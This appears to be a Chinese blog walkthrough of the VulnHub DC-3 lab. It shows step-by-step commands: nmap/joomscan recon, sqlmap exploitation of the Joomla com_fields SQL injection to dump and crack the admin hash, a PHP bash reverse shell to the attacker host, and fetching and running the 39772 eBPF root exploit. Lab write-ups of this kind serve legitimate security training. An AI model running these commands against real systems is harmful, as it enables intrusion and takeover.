vulnhub靶机：dc3

时间：2024-03-06 19:23:35浏览次数：40

标签：http fullordering -- fields list 10.9 vulnhub 靶机 dc3

一：信息收集

1：主机发现

arp-scan -I eth0 10.9.23.0/24

kali的ip

10.9.23.112

靶机的ip

10.4.9.23.243

2：端口扫描

nmap -A -p- -T4 10.9.23.243

3：端口探测

提示要获取root权限

4：目录遍历

查看Wapplayzer信息：

使用的Joomla系统，所以使用joomscan（Joomla漏洞扫描器）扫描器扫描：

joomscan --url http://10.9.23.243

JoomScan 是用于扫描 Joomla 网站以识别潜在漏洞的工具。它可以帮助网站管理员评估其 Joomla 安装的安全性，并采取必要措施防范潜在威胁。

发现一个登录界面

http://10.9.23.243/administrator/

二：渗透测试

1：漏洞利用

使用searchsploit（用于Exploit-DB的命令行搜索工具，可以帮助我们查找渗透模块）搜索Joomla的漏洞：

漏洞简述：这个漏洞出现在3.7.0新引入的一个组件“com_fields”，这个组件任何人都可以访问，无需登陆验证。由于对请求数据过滤不严导致sql 注入，sql注入对导致数据库中的敏感信息泄漏，例如用户的密码hash以及登陆后的用户的session（如果是获取到登陆后管理员的session，那么整个网站的后台系统可能被控制）。

查看一下42033.txt文件，在

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

所以可以使用sqlmap进行注入

sqlmap -u "http://10.9.23.243/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbsy -p list[fullordering]

查看joomladb数据库：

sqlmap -u "http://10.9.23.243/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

有users表，查看#_users的列：

sqlmap -u "http://10.9.23.243/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

查看表中name和password的值：

sqlmap -u "http://10.9.23.243/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

admin

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

得到加密的密码。

还可以使用 joomblah.py 脚本(python2):
wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py

直接进行攻击得到用户名密码：

使用john破解密码

john hash.txt

得到密码

snoopy

2：反弹shell

登录到系统中

浏览后发现可以进入默认浏览器模板的源代码并进行修改，便可以通过加入一句话木马进行反弹shell

<?php
system("bash -c 'bash -i >& /dev/tcp/10.9.23.112/6666 0>&1' ");
?>

保存后kali开启nc监听

nc -lvvp 6666

触发这个反弹shell（访问DC-3的默认主页）

反弹成功

3：提权

成功获取shell后，发现是Ubuntu16.04

cat /proc/version

cat /etc/issue

使用searchsploit工具查找Ubuntu 16.04的提权漏洞，发现一个“拒绝服务漏洞”，可以用来提权。

searchsploit Ubuntu 16.04

查看39772.txt文件：

先下载下来查看

searchsploit -m 39772.txt

发现利用方式，下载链接中的文件，将exploit.tar上传解压并运行：

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

用浏览器进行下载

在kali上开启80端口

python3 -m http.server 80

靶机接收文件

wget http://10.9.23.112/39772.zip

解压zip文件
unzip 39772.zip
cd 39772
解压exploit.tar文件；
命令：
tar -xvf exploit.tar

切换到该目录下

cd ebpf_mapfd_doubleput_exploit/

执行./complie.sh和./doubleput文件；

./compile.sh
chmod +x doubleput
./doubleput

从getshell到shell提权成功

标签：http,fullordering,--,fields,list,10.9,vulnhub,靶机,dc3
From： https://www.cnblogs.com/woaishuaidan/p/18057354

vulnhub靶机：driftingblues7
一：信息收集1：主机发现arp-scan-Ieth010.9.23.0/24kali的ip：10.9.23.112靶机ip：10.9.23.932：端口扫描nmap-A-p--T410.9.23.93开放了22，66，80，443，3306端口3：端口探测访问66端口，因为是上面运行了SimpleHttpServer访问80端口，发现一个登录界面，来百度搜索Eyesofnetwork发......
vulnhub靶机分配不到ip详细解决方法
一：vmwore修改系统配置1：ro修改成rwsingleinit=/bin/bash2：ctrl+x进入bash3：IPa查看它属于哪块网卡4：vi/etc/network/interfaces进入网卡配置信息将auto和iface后的网卡改回来5：重启服务/etc/init.d/networkingrestart6：IPa就可以看到获取成功重启即可二：virtubox最终......
vulnhub靶机：dc-2
一：主机发现arp-scan-Ieth010.4.7.0/24kaliip：10.4.7.128靶机IP：10.4.7.151二：端口扫描nmap-T4-sV-p--A10.4.7.151三：信息收集无法访问更改host文件vim/etc/hosts通过flag1的提示，我们需要使用cewl爆破出用户名和密码，因为他用wordpress框架搭建，我们先使用wpsca......
vulnhub靶机：dc-1
一：信息收集1：主机发现arp-scan-Ieth010.4.7.0/24kali的IP：10.4.7.128靶机ip：10.4.7.1502：端口扫描nmap-T4-sV-p--A10.4.7.1503：信息收集启动Metersploit：msfconsole用search命令查找与Drupal有关的漏洞:searchdrupal选取2018的进行测试，因为有远程代码执行漏......
vulnhub靶机：doubletrouble
一：信息收集1：主机发现2：端口扫描3：敏感目录探测二：渗透测试1：敏感目录扫到三个需要重点关注http://10.4.7.140/core发现该目录下存在很多敏感文件，其中有一个文件下有邮箱用户名和密码，应该是mysql数据库的用户名和密码http://10.4.7.140/uploads猜测该目录应该是登陆后上传......
vulnhub靶机：venus
一：主机发现arp-scan-Ieth010.4.7.0/24二：端口扫描发现开放了22和8080端口三：敏感目录扫描四：渗透测试访问8080端口他说来宾用户可以登录我们找到一个/admin目录访问：http://10.4.7.142:8080/admin它将我们重定向到Django管理登录门户：http://10.4.7.142:8080/adm......
vulnhub靶机：thm-contain
一：信息收集1：主机发现foriin{1..254};do(ping10.4.7.$i-c1-w5>/dev/null&&echo"10.4.7.$i"&);done2：扫描端口forportin{1..65535};doecho>/dev/tcp/10.4.7.134/$port&&echo"port$portisopen"done2>......
vulnhub靶机：cereal
一：信息收集1：主机发现2：端口扫描3：敏感目录扫描二：外部信息1：先试试ftp登录nmap扫到的结果显示它支持匿名登录df4770f645f9ba25c8b90c55760e82950d6245c0ad78ce8ddcdbd6c4947b1da2没发现什么东西2：http登录发现一个域名cereal.ctf扫一下目录sudogobusterdir-uht......
vulnhub靶机：driftingblues-6
一：主机发现arp-scan-Ieth010.9.23.0/24二：端口扫描nmap-T4-sV-p--A10.9.23.54内核3.2可能存在脏牛漏洞三：目录探测dirbhttp://10.9.23.54http://10.9.23.54/robots.txt10.9.23.54/textpattern/textpatternadd.zipextensiontoyourdir-brutehttp://10......
vulnhub靶机：driftingblues-4
一：主机发现arp-scan-Ieth010.9.23.0/24二：端口扫描nmap-T4-sV-p--A10.9.23.195三：端口探测80端口产看源码，发现一串base64Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUU......